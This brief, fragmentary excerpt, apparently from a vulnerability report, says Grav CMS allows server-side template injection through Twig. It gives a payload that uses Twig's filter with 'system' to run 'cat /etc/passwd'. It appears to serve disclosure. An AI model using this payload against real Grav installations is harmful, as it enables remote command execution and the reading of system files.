Grav is vulnerable to Server Side Template Injection via Twig. According to a previous vulnerability report, Twig should not render dangerous functions by default, such as system
.
Payload:
{{['cat\x20/etc/passwd']|filter('system')}}
Advanced
tab.